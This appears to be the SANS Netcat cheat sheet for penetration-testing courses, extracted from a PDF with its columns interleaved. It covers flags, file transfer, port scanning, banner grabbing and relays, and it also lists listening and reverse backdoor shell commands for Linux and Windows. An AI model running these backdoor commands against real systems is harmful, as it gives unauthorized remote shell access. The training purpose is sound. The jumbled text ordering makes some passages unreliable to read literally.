Netcat Relays on Windows Netcat Command Flags Netcat To start, enter a temporary directory where we will $ nc [options] [TargetIPaddr] [port(s)] Cheat Sheet create .bat files: By Ed Skoudis C:\> cd c:\temp The [TargetIPaddr] is simply the other side’s IP address or domain name. It is required in client mode POCKET REFERENCE GUIDE Listener-to-Client Relay: of course (because we have to tell the client where to http://www.sans.org C:\> echo nc [TargetIPaddr] [port] > connect), and is optional in listen mode. relay.bat C:\> nc –l –p [LocalPort] –e relay.bat -l: Listen mode (default is client mode) Purpose -L: Listen harder (supported only on Windows This cheat sheet provides various tips for Create a relay that sends packets from the local port version of Netcat). This option makes Netcat a using Netcat on both Linux and Unix, [LocalPort] to a Netcat Client connected to persistent listener which starts listening again specifically tailored to the SANS 504, 517, [TargetIPaddr] on port [port] after a client disconnects and 560 courses. All syntax is designed for -u: UDP mode (default is TCP) the original Netcat versions, released by -p: Local port (In listen mode, this is port listened Hobbit and Weld Pond. The syntax here Listener-to-Listener Relay: on. In client mode, this is source port for all can be adapted for other Netcats, including C:\> echo nc –l –p [LocalPort_2] > packets sent) ncat, gnu Netcat, and others. relay.bat -e: Program to execute after connection occurs, C:\> nc –l –p [LocalPort_1] –e connecting STDIN and STDOUT to the relay.bat program Fundamentals -n: Don’t perform DNS lookups on names of Create a relay that will send packets from any machines on the other side Fundamental Netcat Client: connection on to any connection $ nc [TargetIPaddr] [port] [LocalPort_1] -z: Zero-I/O mode (Don’t send any data, just emit on [LocalPort_2] a packet without payload) Connect to an arbitrary port [port] at IP Address -wN: Timeout for connects, waits for N seconds [TargetIPaddr] after closure of STDIN. A Netcat client or Client-to-Client Relay: listener with this option will wait for N seconds C:\> echo nc [NextHopIPaddr] [port2] > Fundamental Netcat Listener: to make a connection. If the connection relay.bat $ nc –l -p [LocalPort] doesn’t happen in that time, Netcat stops C:\> nc [PreviousHopIPaddr] [port] –e running. relay.bat Create a Netcat listener on arbitrary local port -v: Be verbose, printing out messages on [LocalPort] Create a relay that will send packets from the Standard Error, such as when a connection connection to [PreviousHopIPaddr] on port occurs Both the client and listener take input from STDIN [port] to a Netcat Client connected to -vv: Be very verbose, printing even more details and send data received from the network to STDOUT on Standard Error [NextHopIPaddr] on port [port2] File Transfer TCP Banner Grabber Netcat Relays on Linux To start, create a FIFO (named pipe) called Push a file from client to listener: Grab the banner of any TCP service running on an IP backpipe: $ nc –l -p [LocalPort] > [outfile] Address from Linux: $ cd /tmp $ echo "" | nc –v –n –w1 [TargetIPaddr] $ mknod backpipe p Listen on , store results in [ [start_port]-[end_port] [LocalPort] outfile] $ nc –w3 [TargetIPaddr] [port] < Attempt to connect to each port in a range from Listener-to-Client Relay: [infile] [end_port] to [start_port] on IP Address $ nc –l –p [LocalPort] 0<backpipe | nc running verbosely (-v), not [TargetIPaddr] [TargetIPaddr] [port] | tee backpipe Push to on [infile] [TargetIPaddr] [port] resolving names (-n), and waiting no more than 1 second for a connection to occur (-w1). Then send a Create a relay that sends packets from the local port Pull file from listener back to client: blank string to the open port and print out any [LocalPort] to a Netcat client connected to $ nc –l -p [LocalPort] < [infile] banner received in response [TargetIPaddr] on port [port] Listen on [LocalPort], prep to push [infile] Add –r to randomize destination ports within the range Listener-to-Listener Relay: $ nc –w3 [TargetIPaddr] [port] > $ nc –l –p [LocalPort_1] 0<backpipe | [outfile] Add –p [port] to specify a source port for the nc –l –p [LocalPort_2] | tee backpipe scan Connect to [TargetIPaddr] on [port] and Backdoor Shells Create a relay that sends packets from any retrieve [outfile] connection on [LocalPort_1] to any connection Listening backdoor shell on Linux: on [LocalPort_2] TCP Port Scanner $ nc –l –p [LocalPort] –e /bin/bash Listening backdoor shell on Windows: Port scan an IP Address: C:\> nc –l –p [LocalPort] –e cmd.exe Client-to-Client Relay: $ nc –v –n –z –w1 [TargetIPaddr] [start_port]-[end_port] $ nc [PreviousHopIPaddr] [port] Create a shell on local port that can [LocalPort] 0<backpipe | nc [NextHopIPaddr] then be accessed using a fundamental Netcat client [port2] | tee backpipe Attempt to connect to each port in a range from [end_port] to [start_port] on IP Address Reverse backdoor shell on Linux: Create a relay that sends packets from the [TargetIPaddr] running verbosely (-v on Linux, - $ nc [YourIPaddr] [port] –e /bin/bash connection to [PreviousHopIPaddr] on port vv on Windows), not resolving names (-n), without Reverse backdoor shell on Windows: [port] to a Netcat client connected to sending any data (-z), and waiting no more than 1 C:\> nc [YourIPaddr] [port] –e cmd.exe [NextHopIPaddr] on port [port2] second for a connection to occur (-w1) Create a reverse shell that will attempt to connect to The randomize ports (-r) switch can be used to [YourIPaddr] on local port [port]. This shell choose port numbers randomly in the range can then be captured using a fundamental nc listener .